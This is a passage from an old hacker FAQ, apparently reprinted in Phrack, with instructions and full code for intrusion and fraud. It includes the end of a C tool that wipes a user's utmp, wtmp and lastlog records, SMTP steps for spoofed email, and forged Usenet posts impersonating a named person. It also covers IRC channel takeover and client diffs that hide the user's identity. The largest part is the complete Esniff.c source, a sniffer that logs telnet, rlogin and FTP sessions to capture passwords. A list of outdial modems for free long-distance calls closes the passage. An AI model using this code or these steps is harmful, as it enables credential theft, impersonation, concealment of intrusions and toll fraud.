  5878.  
  5879.      while(pos != -1L) {
  5880.         lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
  5881.         if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
  5882.           pos = -1L;
  5883.         } else {
  5884.           if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
  5885.                bzero((char *)&utmp_ent,sizeof(struct utmp ));
  5886.                lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
  5887.                write (f, &utmp_ent, sizeof (utmp_ent));
  5888.                pos = -1L;
  5889.           } else pos += 1L;
  5890.         }
  5891.      }
  5892.      close(f);
  5893.   }
  5894. }
  5895.  
  5896. void kill_lastlog(who)
  5897. char *who;
  5898. {
  5899.     struct passwd *pwd;
  5900.     struct lastlog newll;
  5901.  
  5902.      if ((pwd=getpwnam(who))!=NULL) {
  5903.  
  5904.         if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
  5905.             lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
  5906.             bzero((char *)&newll,sizeof( newll ));
  5907.             write(f, (char *)&newll, sizeof( newll ));
  5908.             close(f);
  5909.         }
  5910.  
  5911.     } else printf("%s: ?\n",who);
  5912. }
  5913.  
  5914. main(argc,argv)
  5915. int argc;
  5916. char *argv[];
  5917. {
  5918.     if (argc==2) {
  5919.         kill_lastlog(argv[1]);
  5920.         kill_wtmp(argv[1]);
  5921.         kill_utmp(argv[1]);
  5922.         printf("Zap2!\n");
  5923.     } else
  5924.     printf("Error.\n");
  5925. }
  5926.  
  5927.  
  5928. 12. How do I send fakemail?
  5929.  
  5930. Telnet to port 25 of the machine you want the mail to appear to
  5931. originate from.  Enter your message as in this example:
  5932.  
  5933.  HELO bellcore.com
  5934.  MAIL FROM:Voyager@bellcore.com
  5935.  RCPT TO:president@whitehouse.gov
  5936.  DATA
  5937.  
  5938.     Please discontinue your silly Clipper initiative.
  5939.  .
  5940.  QUIT
  5941.  
  5942. On systems that have RFC 931 implemented, spoofing your "MAIL FROM:"
  5943. line will not work.  Test by sending yourself fakemail first.
  5944.  
  5945. For more information read RFC 822 "Standard for the format of ARPA
  5946. Internet text messages."
  5947.  
  5948.  
  5949. 13. How do I fake posts to UseNet?
  5950.  
  5951. Use inews to post.  Give inews the following lines:
  5952.  
  5953.  From:
  5954.  Newsgroups:
  5955.  Subject:
  5956.  Message-ID:
  5957.  Date:
  5958.  Organization:
  5959.  
  5960. For a moderated newsgroup, inews will also require this line:
  5961.  
  5962.  Approved:
  5963.  
  5964. Then add your post and terminate with <Control-D>.
  5965.  
  5966. Example:
  5967.  
  5968.  From: Eric S. Real
  5969.  Newsgroups: alt.hackers
  5970.  Subject: Pathetic bunch of wannabe losers
  5971.  Message-ID: <esr.123@locke.ccil.org>
  5972.  Date: Fri, 13 Aug 1994 12:15:03
  5973.  Organization: Moral Majority
  5974.  
  5975.  A pathetic bunch of wannabe losers is what most of you are, with no
  5976.  right to steal the honorable title of `hacker' to puff up your silly
  5977.  adolescent egos. Get stuffed, get lost, and go to jail.
  5978.  
  5979.                                         Eric S. Real <esr@locke.ccil.org>
  5980.  
  5981.  
  5982.  ^D
  5983.  
  5984. Note that many systems will append an Originator: line to your message
  5985. header, effectively revealing the account from which the message was
  5986. posted.
  5987.  
  5988.  
  5989. 14. How do I hack ChanOp on IRC?
  5990.  
  5991. Find a server that is split from the rest of IRC and create your own
  5992. channel there using the name of the channel you want ChanOp on.  When
  5993. that server reconnects to the net, you will have ChanOp on the real
  5994. channel.  If you have ServerOp on a server, you can cause it to split
  5995. on purpose.
  5996.  
  5997.  
  5998. 15. How do I modify the IRC client to hide my real username?
  5999.  
  6000. Get the IRC client from cs.bu.edu /irc/clients.  Look at the source
  6001. code files irc.c and ctcp.c.  The code you are looking for is fairly
  6002. easy to spot.  Change it. Change the username code in irc.c and the
  6003. ctcp information code in ctcp.c.  Compile and run your client.
  6004.  
  6005. Here are the diffs from a sample hack of the IRC client.  Your client
  6006. code will vary slightly depending on what IRC client version you are
  6007. running.
  6008.  
  6009. *** ctcp.c.old  Wed Feb 10 10:08:05 1993
  6010. --- ctcp.c      Fri Feb 12 04:33:55 1993
  6011. ***************
  6012. *** 331,337 ****
  6013.     struct  passwd  *pwd;
  6014.     long    diff;
  6015.     int     uid;
  6016. !       char    c;
  6017.   
  6018.     /*
  6019.      * sojge complained that ircII says 'idle 1 seconds'
  6020. --- 331,337 ----
  6021.     struct  passwd  *pwd;
  6022.     long    diff;
  6023.     int     uid;
  6024. !       char    c, *fing;
  6025.   
  6026.     /*
  6027.      * sojge complained that ircII says 'idle 1 seconds'
  6028. ***************
  6029. *** 348,354 ****
  6030.     if (uid != DAEMON_UID)
  6031.     {
  6032.   #endif /* DAEMON_UID */       
  6033. !               if (pwd = getpwuid(uid))
  6034.         {
  6035.             char    *tmp;
  6036.   
  6037. --- 348,356 ----
  6038.     if (uid != DAEMON_UID)
  6039.     {
  6040.   #endif /* DAEMON_UID */       
  6041. !               if (fing = getenv("IRCFINGER"))
  6042. !                       send_ctcp_reply(from, ctcp->name, fing, diff, c);
  6043. !               else if (pwd = getpwuid(uid))
  6044.         {
  6045.             char    *tmp;
  6046.   
  6047. *** irc.c.old   Wed Feb 10 06:33:11 1993
  6048. --- irc.c       Fri Feb 12 04:02:11 1993
  6049. ***************
  6050. *** 510,516 ****
  6051.         malloc_strcpy(&my_path, "/");
  6052.     if (*realname == null(char))
  6053.         strmcpy(realname, "*Unknown*", REALNAME_LEN);
  6054. !       if (*username == null(char))
  6055.     {
  6056.         if (ptr = getenv("USER"))
  6057.             strmcpy(username, ptr, NAME_LEN);
  6058. --- 510,518 ----
  6059.         malloc_strcpy(&my_path, "/");
  6060.     if (*realname == null(char))
  6061.         strmcpy(realname, "*Unknown*", REALNAME_LEN);
  6062. !       if (ptr = getenv("IRCUSER"))
  6063. !               strmcpy(username, ptr, NAME_LEN);
  6064. !       else if (*username == null(char))
  6065.     {
  6066.         if (ptr = getenv("USER"))
  6067.             strmcpy(username, ptr, NAME_LEN);
  6068.  
  6069.  
  6070. 16. How to I change to directories with strange characters in them?
  6071.  
  6072. These directories are often used by people trying to hide information,
  6073. most often warez (commercial software).
  6074.  
  6075. There are several things you can do to determine what these strange
  6076. characters are.  One is to use the arguments to the ls command that
  6077. cause ls to give you more information:
  6078.  
  6079. From the man page for ls:
  6080.  
  6081.     -F   Causes directories to be marked with a trailing ``/'',
  6082.      executable files to be marked with a trailing ``*'', and
  6083.      symbolic links to be marked with a trailing ``@'' symbol.
  6084.  
  6085.     -q   Forces printing of non-graphic characters in filenames as the
  6086.      character ``?''.
  6087.  
  6088.     -b   Forces printing of non-graphic characters in the \ddd
  6089.      notation, in octal.
  6090.  
  6091. Perhaps the most useful tool is to simply do an "ls -al filename" to
  6092. save the directory of the remote ftp site as a file on your local
  6093. machine.  Then you can do a "cat -t -v -e filename" to see exactly
  6094. what those bizarre little characters are.
  6095.  
  6096. From the man page for cat:
  6097.  
  6098.     -v  Causes non-printing characters (with the exception of tabs,
  6099.     newlines, and form feeds) to be displayed.  Control characters
  6100.     are displayed as ^X (<Ctrl>x), where X is the key pressed with
  6101.     the <Ctrl> key (for example, <Ctrl>m is displayed as ^M).  The
  6102.     <Del> character (octal 0177) is printed as ^?.  Non-ASCII
  6103.     characters (with the high bit set) are printed as M -x, where
  6104.     x is the character specified by the seven low order bits.
  6105.  
  6106.     -t  Causes tabs to be printed as ^I and form feeds as ^L.  This
  6107.     option is ignored if the -v option is not specified.
  6108.  
  6109.     -e  Causes a ``$'' character to be printed at the end of each line
  6110.     (prior to the new-line).  This option is ignored if the -v
  6111.     option is not set.
  6112.  
  6113. If the directory name includes a <SPACE> or a <TAB> you will need to
  6114. enclose the entire directory name in quotes.  Example:
  6115.  
  6116. cd "..<TAB>"
  6117.  
  6118. On an IBM-PC, you may enter these special characters by holding down
  6119. the <ALT> key and entering the decimal value of the special character
  6120. on your numeric keypad.  When you release the <ALT> key, the special
  6121. character should appear on your screen.  An ASCII chart can be very
  6122. helpful.
  6123.  
  6124. Sometimes people will create directories with some of the standard
  6125. stty control characters in them, such as ^Z (suspend) or ^C (intr).
  6126. To get into those directories, you will first need to user stty to
  6127. change the control character in qustion to another character.
  6128.  
  6129. From the man page for stty:
  6130.  
  6131.     Control assignments
  6132.  
  6133.     control-character C
  6134.                       Sets control-character to C, where control-character is
  6135.                       erase, kill, intr (interrupt), quit, eof, eol, swtch
  6136.                       (switch), start, stop or susp.
  6137.  
  6138.                       start and stop are available as possible control char-
  6139.                       acters for the control-character C assignment.
  6140.  
  6141.                       If C is preceded by a caret (^) (escaped from the
  6142.                       shell), then the value used is the corresponding con-
  6143.                       trol character (for example, ^D is a <Ctrl>d; ^? is
  6144.                       interpreted as DELETE and ^- is interpreted as unde-
  6145.                       fined).
  6146.  
  6147. Use the stty -a command to see your current stty settings, and to
  6148. determine which one is causing you problems.
  6149.  
  6150.  
  6151. 17. What is ethernet sniffing?
  6152.  
  6153. Ethernet sniffing is listening (with software) to the raw ethernet
  6154. device for packets that interest you.  When your software sees a
  6155. packet that fits certain criteria, it logs it to a file.  The most
  6156. common criteria for an interesting packet is one that contains words
  6157. like "login" or "password."
  6158.  
  6159. Many ethernet sniffers are available, here are a few that may be on
  6160. your system now:
  6161.  
  6162. OS              Sniffer
  6163. ~~              ~~~~~~~
  6164. HP/UX           nettl (monitor) & netfmt (display)
  6165.                 nfswatch        /* Available via anonymous ftp           */
  6166. Irix            nfswatch        /* Available via anonymous ftp           */
  6167.                 Etherman
  6168. SunOS           etherfind
  6169.                 nfswatch        /* Available via anonymous ftp           */
  6170. Solaris         snoop
  6171. DOS             ETHLOAD         /* Available via anonymous ftp as        */
  6172.                                 /* ethld104.zip                          */
  6173.                 The Gobbler     /* Available via anonymous ftp           */
  6174.                 LanPatrol
  6175.                 LanWatch
  6176.         Netmon
  6177.                 Netwatch
  6178.                 Netzhack        /* Available via anonymous ftp at        */
  6179.                                 /* mistress.informatik.unibw-muenchen.de */
  6180.                                 /* /pub/netzhack.mac                     */
  6181. Macintosh       Etherpeek
  6182.  
  6183. Here is source code for an ethernet sniffer:
  6184.  
  6185. /* Esniff.c */
  6186.  
  6187. #include <stdio.h>
  6188. #include <ctype.h>
  6189. #include <string.h>
  6190.  
  6191. #include <sys/time.h>
  6192. #include <sys/file.h>
  6193. #include <sys/stropts.h>
  6194. #include <sys/signal.h>
  6195. #include <sys/types.h>
  6196. #include <sys/socket.h>
  6197. #include <sys/ioctl.h>
  6198.  
  6199. #include <net/if.h>
  6200. #include <net/nit_if.h>
  6201. #include <net/nit_buf.h>
  6202. #include <net/if_arp.h>
  6203.  
  6204. #include <netinet/in.h>
  6205. #include <netinet/if_ether.h>
  6206. #include <netinet/in_systm.h>
  6207. #include <netinet/ip.h>
  6208. #include <netinet/udp.h>
  6209. #include <netinet/ip_var.h>
  6210. #include <netinet/udp_var.h>
  6211. #include <netinet/in_systm.h>
  6212. #include <netinet/tcp.h>
  6213. #include <netinet/ip_icmp.h>
  6214.  
  6215. #include <netdb.h>
  6216. #include <arpa/inet.h>
  6217.  
  6218. #define ERR stderr
  6219.  
  6220. char    *malloc();
  6221. char    *device,
  6222.         *ProgName,
  6223.         *LogName;
  6224. FILE    *LOG;
  6225. int     debug=0;
  6226.  
  6227. #define NIT_DEV     "/dev/nit"
  6228. #define CHUNKSIZE   4096        /* device buffer size */
  6229. int     if_fd = -1;
  6230. int     Packet[CHUNKSIZE+32];
  6231.  
  6232. void Pexit(err,msg)
  6233. int err; char *msg;
  6234. { perror(msg);
  6235.   exit(err); }
  6236.  
  6237. void Zexit(err,msg)
  6238. int err; char *msg;
  6239. { fprintf(ERR,msg);
  6240.   exit(err); }
  6241.  
  6242. #define IP          ((struct ip *)Packet)
  6243. #define IP_OFFSET   (0x1FFF)
  6244. #define SZETH       (sizeof(struct ether_header))
  6245. #define IPLEN       (ntohs(ip->ip_len))
  6246. #define IPHLEN      (ip->ip_hl)
  6247. #define TCPOFF      (tcph->th_off)
  6248. #define IPS         (ip->ip_src)
  6249. #define IPD         (ip->ip_dst)
  6250. #define TCPS        (tcph->th_sport)
  6251. #define TCPD        (tcph->th_dport)
  6252. #define IPeq(s,t)   ((s).s_addr == (t).s_addr)
  6253.  
  6254. #define TCPFL(FLAGS) (tcph->th_flags & (FLAGS))
  6255.  
  6256. #define MAXBUFLEN  (128)
  6257. time_t  LastTIME = 0;
  6258.  
  6259. struct CREC {
  6260.      struct CREC *Next,
  6261.                  *Last;
  6262.      time_t  Time;              /* start time */
  6263.      struct in_addr SRCip,
  6264.                     DSTip;
  6265.      u_int   SRCport,           /* src/dst ports */
  6266.              DSTport;
  6267.      u_char  Data[MAXBUFLEN+2]; /* important stuff :-) */
  6268.      u_int   Length;            /* current data length */
  6269.      u_int   PKcnt;             /* # pkts */
  6270.      u_long  LASTseq;
  6271. };
  6272.  
  6273. struct CREC *CLroot = NULL;
  6274.  
  6275. char *Symaddr(ip)
  6276. register struct in_addr ip;
  6277. { register struct hostent *he =
  6278.       gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET);
  6279.  
  6280.   return( (he)?(he->h_name):(inet_ntoa(ip)) );
  6281. }
  6282.  
  6283. char *TCPflags(flgs)
  6284. register u_char flgs;
  6285. { static char iobuf[8];
  6286. #define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-')
  6287.  
  6288.   SFL(0,TH_FIN, 'F');
  6289.   SFL(1,TH_SYN, 'S');
  6290.   SFL(2,TH_RST, 'R');
  6291.   SFL(3,TH_PUSH,'P');
  6292.   SFL(4,TH_ACK, 'A');
  6293.   SFL(5,TH_URG, 'U');
  6294.   iobuf[6]=0;
  6295.   return(iobuf);
  6296. }
  6297.  
  6298. char *SERVp(port)
  6299. register u_int port;
  6300. { static char buf[10];
  6301.   register char *p;
  6302.  
  6303.    switch(port) {
  6304.      case IPPORT_LOGINSERVER: p="rlogin"; break;
  6305.      case IPPORT_TELNET:      p="telnet"; break;
  6306.      case IPPORT_SMTP:        p="smtp"; break;
  6307.      case IPPORT_FTP:         p="ftp"; break;
  6308.      default: sprintf(buf,"%u",port); p=buf; break;
  6309.    }
  6310.    return(p);
  6311. }
  6312.  
  6313. char *Ptm(t)
  6314. register time_t *t;
  6315. { register char *p = ctime(t);
  6316.   p[strlen(p)-6]=0; /* strip " YYYY\n" */
  6317.   return(p);
  6318. }
  6319.  
  6320. char *NOWtm()
  6321. { time_t tm;
  6322.   time(&tm);
  6323.   return( Ptm(&tm) );
  6324. }
  6325.  
  6326. #define MAX(a,b) (((a)>(b))?(a):(b))
  6327. #define MIN(a,b) (((a)<(b))?(a):(b))
  6328.  
  6329. /* add an item */
  6330. #define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \
  6331.   register struct CREC *CLtmp = \
  6332.         (struct CREC *)malloc(sizeof(struct CREC)); \
  6333.   time( &(CLtmp->Time) ); \
  6334.   CLtmp->SRCip.s_addr = SIP.s_addr; \
  6335.   CLtmp->DSTip.s_addr = DIP.s_addr; \
  6336.   CLtmp->SRCport = SPORT; \
  6337.   CLtmp->DSTport = DPORT; \
  6338.   CLtmp->Length = MIN(LEN,MAXBUFLEN); \
  6339.   bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \
  6340.   CLtmp->PKcnt = 1; \
  6341.   CLtmp->Next = CLroot; \
  6342.   CLtmp->Last = NULL; \
  6343.   CLroot = CLtmp; \
  6344. }
  6345.  
  6346. register struct CREC *GET_NODE(Sip,SP,Dip,DP)
  6347. register struct in_addr Sip,Dip;
  6348. register u_int SP,DP;
  6349. { register struct CREC *CLr = CLroot;
  6350.  
  6351.   while(CLr != NULL) {
  6352.     if( (CLr->SRCport == SP) && (CLr->DSTport == DP) &&
  6353.         IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) )
  6354.             break;
  6355.     CLr = CLr->Next;
  6356.   }
  6357.   return(CLr);
  6358. }
  6359.  
  6360. #define ADDDATA_NODE(CL,DATA,LEN) { \
  6361.  bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \
  6362.  CL->Length += LEN; \
  6363. }
  6364.  
  6365. #define PR_DATA(dp,ln) {    \
  6366.   register u_char lastc=0; \
  6367.   while(ln-- >0) { \
  6368.      if(*dp < 32) {  \
  6369.         switch(*dp) { \
  6370.             case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \
  6371.                         break; \
  6372.             case '\r': \
  6373.             case '\n': fprintf(LOG,"\n     : "); \
  6374.                         break; \
  6375.             default  : fprintf(LOG,"^%c", (*dp + 64)); \
  6376.                         break; \
  6377.         } \
  6378.      } else { \
  6379.         if(isprint(*dp)) fputc(*dp,LOG); \
  6380.         else fprintf(LOG,"(%d)",*dp); \
  6381.      } \
  6382.      lastc = *dp++; \
  6383.   } \
  6384.   fflush(LOG); \
  6385. }
  6386.  
  6387. void END_NODE(CLe,d,dl,msg)
  6388. register struct CREC *CLe;
  6389. register u_char *d;
  6390. register int dl;
  6391. register char *msg;
  6392. {
  6393.    fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time));
  6394.    fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport));
  6395.    fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport));
  6396.    fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n",
  6397.                         NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg);
  6398.    fprintf(LOG," DATA: ");
  6399.     { register u_int i = CLe->Length;
  6400.       register u_char *p = CLe->Data;
  6401.       PR_DATA(p,i);
  6402.       PR_DATA(d,dl);
  6403.     }
  6404.  
  6405.    fprintf(LOG,"\n-- \n");
  6406.    fflush(LOG);
  6407.  
  6408.    if(CLe->Next != NULL)
  6409.     CLe->Next->Last = CLe->Last;
  6410.    if(CLe->Last != NULL)
  6411.     CLe->Last->Next = CLe->Next;
  6412.    else
  6413.     CLroot = CLe->Next;
  6414.    free(CLe);
  6415. }
  6416.  
  6417. /* 30 mins (x 60 seconds) */
  6418. #define IDLE_TIMEOUT 1800
  6419. #define IDLE_NODE() { \
  6420.   time_t tm; \
  6421.   time(&tm); \
  6422.   if(LastTIME<tm) { \
  6423.      register struct CREC *CLe,*CLt = CLroot; \
  6424.      LastTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT; \
  6425.      while(CLe=CLt) { \
  6426.        CLt=CLe->Next; \
  6427.        if(CLe->Time <tm) \
  6428.            END_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOUT"); \
  6429.      } \
  6430.   } \
  6431. }
  6432.  
  6433. void filter(cp, pktlen)
  6434. register char *cp;
  6435. register u_int pktlen;
  6436. {
  6437.  register struct ip     *ip;
  6438.  register struct tcphdr *tcph;
  6439.  
  6440.  { register u_short EtherType=ntohs(((struct ether_header *)cp)->ether_type);
  6441.  
  6442.    if(EtherType < 0x600) {
  6443.      EtherType = *(u_short *)(cp + SZETH + 6);
  6444.      cp+=8; pktlen-=8;
  6445.    }
  6446.  
  6447.    if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */
  6448.       return;
  6449.  }
  6450.  
  6451.     /* ugh, gotta do an alignment :-( */
  6452.  bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH));
  6453.  
  6454.  ip = (struct ip *)Packet;
  6455.  if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */
  6456.     return;
  6457.  tcph = (struct tcphdr *)(Packet + IPHLEN);
  6458.  
  6459.  if(!( (TCPD == IPPORT_TELNET) ||
  6460.        (TCPD == IPPORT_LOGINSERVER) ||
  6461.        (TCPD == IPPORT_FTP)
  6462.    )) return;
  6463.  
  6464.  { register struct CREC *CLm;
  6465.    register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4));
  6466.    register u_char *p = (u_char *)Packet;
  6467.  
  6468.    p += ((IPHLEN * 4) + (TCPOFF * 4));
  6469.  
  6470.  if(debug) {
  6471.   fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length);
  6472.   fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS));
  6473.   fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD));
  6474.  }
  6475.  
  6476.    if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) {
  6477.  
  6478.       CLm->PKcnt++;
  6479.  
  6480.       if(length>0)
  6481.         if( (CLm->Length + length) < MAXBUFLEN ) {
  6482.           ADDDATA_NODE( CLm, p,length);
  6483.         } else {
  6484.           END_NODE( CLm, p,length, "DATA LIMIT");
  6485.         }
  6486.  
  6487.       if(TCPFL(TH_FIN|TH_RST)) {
  6488.           END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" );
  6489.       }
  6490.  
  6491.    } else {
  6492.  
  6493.       if(TCPFL(TH_SYN)) {
  6494.          ADD_NODE(IPS,IPD,TCPS,TCPD,p,length);
  6495.       }
  6496.  
  6497.    }
  6498.  
  6499.    IDLE_NODE();
  6500.  
  6501.  }
  6502.  
  6503. }
  6504.  
  6505. /* signal handler
  6506.  */
  6507. void death()
  6508. { register struct CREC *CLe;
  6509.  
  6510.     while(CLe=CLroot)
  6511.         END_NODE( CLe, (u_char *)NULL,0, "SIGNAL");
  6512.  
  6513.     fprintf(LOG,"\nLog ended at => %s\n",NOWtm());
  6514.     fflush(LOG);
  6515.     if(LOG != stdout)
  6516.         fclose(LOG);
  6517.     exit(1);
  6518. }
  6519.  
  6520. /* opens network interface, performs ioctls and reads from it,
  6521.  * passing data to filter function
  6522.  */
  6523. void do_it()
  6524. {
  6525.     int cc;
  6526.     char *buf;
  6527.     u_short sp_ts_len;
  6528.  
  6529.     if(!(buf=malloc(CHUNKSIZE)))
  6530.         Pexit(1,"Eth: malloc");
  6531.  
  6532. /* this /dev/nit initialization code pinched from etherfind */
  6533.   {
  6534.     struct strioctl si;
  6535.     struct ifreq    ifr;
  6536.     struct timeval  timeout;
  6537.     u_int  chunksize = CHUNKSIZE;
  6538.     u_long if_flags  = NI_PROMISC;
  6539.  
  6540.     if((if_fd = open(NIT_DEV, O_RDONLY)) < 0)
  6541.         Pexit(1,"Eth: nit open");
  6542.  
  6543.     if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0)
  6544.         Pexit(1,"Eth: ioctl (I_SRDOPT)");
  6545.  
  6546.     si.ic_timout = INFTIM;
  6547.  
  6548.     if(ioctl(if_fd, I_PUSH, "nbuf") < 0)
  6549.         Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")");
  6550.  
  6551.     timeout.tv_sec = 1;
  6552.     timeout.tv_usec = 0;
  6553.     si.ic_cmd = NIOCSTIME;
  6554.     si.ic_len = sizeof(timeout);
  6555.     si.ic_dp  = (char *)&timeout;
  6556.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  6557.         Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)");
  6558.  
  6559.     si.ic_cmd = NIOCSCHUNK;
  6560.     si.ic_len = sizeof(chunksize);
  6561.     si.ic_dp  = (char *)&chunksize;
  6562.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  6563.         Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)");
  6564.  
  6565.     strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));
  6566.     ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0';
  6567.     si.ic_cmd = NIOCBIND;
  6568.     si.ic_len = sizeof(ifr);
  6569.     si.ic_dp  = (char *)𝔦
  6570.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  6571.         Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)");
  6572.  
  6573.     si.ic_cmd = NIOCSFLAGS;
  6574.     si.ic_len = sizeof(if_flags);
  6575.     si.ic_dp  = (char *)&if_flags;
  6576.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  6577.         Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)");
  6578.  
  6579.     if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0)
  6580.         Pexit(1,"Eth: ioctl (I_FLUSH)");
  6581.   }
  6582.  
  6583.     while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) {
  6584.         register char *bp = buf,
  6585.                       *bufstop = (buf + cc);
  6586.  
  6587.         while (bp < bufstop) {
  6588.             register char *cp = bp;
  6589.             register struct nit_bufhdr *hdrp;
  6590.  
  6591.             hdrp = (struct nit_bufhdr *)cp;
  6592.             cp += sizeof(struct nit_bufhdr);
  6593.             bp += hdrp->nhb_totlen;
  6594.             filter(cp, (u_long)hdrp->nhb_msglen);
  6595.         }
  6596.     }
  6597.     Pexit((-1),"Eth: read");
  6598. }
  6599.  /* Authorize your proogie,generate your own password and uncomment here */
  6600. /* #define AUTHPASSWD "EloiZgZejWyms" */
  6601.  
  6602. void getauth()
  6603. { char *buf,*getpass(),*crypt();
  6604.   char pwd[21],prmpt[81];
  6605.  
  6606.     strcpy(pwd,AUTHPASSWD);
  6607.     sprintf(prmpt,"(%s)UP? ",ProgName);
  6608.     buf=getpass(prmpt);
  6609.     if(strcmp(pwd,crypt(buf,pwd)))
  6610.         exit(1);
  6611. }
  6612.     */
  6613. void main(argc, argv)
  6614. int argc;
  6615. char **argv;
  6616. {
  6617.     char   cbuf[BUFSIZ];
  6618.     struct ifconf ifc;
  6619.     int    s,
  6620.            ac=1,
  6621.            backg=0;
  6622.  
  6623.     ProgName=argv[0];
  6624.  
  6625.  /*     getauth(); */
  6626.  
  6627.     LOG=NULL;
  6628.     device=NULL;
  6629.     while((ac<argc) && (argv[ac][0] == '-')) {
  6630.        register char ch = argv[ac++][1];
  6631.        switch(toupper(ch)) {
  6632.             case 'I': device=argv[ac++];
  6633.                       break;
  6634.             case 'F': if(!(LOG=fopen((LogName=argv[ac++]),"a")))
  6635.                          Zexit(1,"Output file cant be opened\n");
  6636.                       break;
  6637.             case 'B': backg=1;
  6638.                       break;
  6639.             case 'D': debug=1;
  6640.                       break;
  6641.             default : fprintf(ERR,
  6642.                         "Usage: %s [-b] [-d] [-i interface] [-f file]\n",
  6643.                             ProgName);
  6644.                       exit(1);
  6645.        }
  6646.     }
  6647.  
  6648.     if(!device) {
  6649.         if((s=socket(AF_INET, SOCK_DGRAM, 0)) < 0)
  6650.             Pexit(1,"Eth: socket");
  6651.  
  6652.         ifc.ifc_len = sizeof(cbuf);
  6653.         ifc.ifc_buf = cbuf;
  6654.         if(ioctl(s, SIOCGIFCONF, (char *)&ifc) < 0)
  6655.             Pexit(1,"Eth: ioctl");
  6656.  
  6657.         close(s);
  6658.         device = ifc.ifc_req->ifr_name;
  6659.     }
  6660.  
  6661.     fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV);
  6662.     fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout",
  6663.             (debug)?" (debug)":"",(backg)?" Backgrounding ":"\n");
  6664.  
  6665.     if(!LOG)
  6666.         LOG=stdout;
  6667.  
  6668.     signal(SIGINT, death);
  6669.     signal(SIGTERM,death);
  6670.     signal(SIGKILL,death);
  6671.     signal(SIGQUIT,death);
  6672.  
  6673.     if(backg && debug) {
  6674.          fprintf(ERR,"[Cannot bg with debug on]\n");
  6675.          backg=0;
  6676.     }
  6677.  
  6678.     if(backg) {
  6679.         register int s;
  6680.  
  6681.         if((s=fork())>0) {
  6682.            fprintf(ERR,"[pid %d]\n",s);
  6683.            exit(0);
  6684.         } else if(s<0)
  6685.            Pexit(1,"fork");
  6686.  
  6687.         if( (s=open("/dev/tty",O_RDWR))>0 ) {
  6688.                 ioctl(s,TIOCNOTTY,(char *)NULL);
  6689.                 close(s);
  6690.         }
  6691.     }
  6692.     fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid());
  6693.     fflush(LOG);
  6694.  
  6695.     do_it();
  6696. }
  6697.  
  6698.                               ==Phrack Magazine==
  6699.  
  6700.                  Volume Six, Issue Forty-Seven, File 6 of 22
  6701.  
  6702.  
  6703.  
  6704. 18. What is an Internet Outdial?
  6705.  
  6706. An Internet outdial is a modem connected to the Internet than you can
  6707. use to dial out.  Normal outdials will only call local numbers.  A GOD
  6708. (Global OutDial) is capable of calling long distance.  Outdials are an
  6709. inexpensive method of calling long distance BBS's.
  6710.  
  6711.  
  6712. 19. What are some Internet Outdials?
  6713.  
  6714. This FAQ answer is excerpted from CoTNo #5:
  6715.  
  6716.             Internet Outdial List v3.0
  6717.              by Cavalier and DisordeR
  6718.  
  6719.  
  6720. Introduction
  6721. ------------
  6722. There are several lists of Internet outdials floating around the net these
  6723. days. The following is a compilation of other lists, as well as v2.0 by
  6724. DeadKat(CoTNo issue 2, article 4). Unlike other lists where the author
  6725. just ripped other people and released it, we have sat down and tested
  6726. each one of these. Some of them we have gotten "Connection Refused" or
  6727. it timed out while trying to connect...these have been labeled dead.
  6728.  
  6729.  
  6730.                Working Outdials
  6731.                ----------------
  6732.                 as of 12/29/94
  6733.  
  6734. NPA          IP Address                   Instructions
  6735. ---          ----------                   ------------
  6736. 215          isn.upenn.edu                modem
  6737.  
  6738. 217          dialout.cecer.army.mil       atdt x,xxxXXXXX
  6739.  
  6740. 218          modem.d.umn.edu              atdt9,xxxXXXX
  6741.  
  6742. 303          yuma.acns.colostate.edu 3020
  6743.  
  6744. 412          gate.cis.pitt.edu            tn3270, 
  6745.                       connect dialout.pitt.edu, 
  6746.                       atdtxxxXXXX
  6747.  
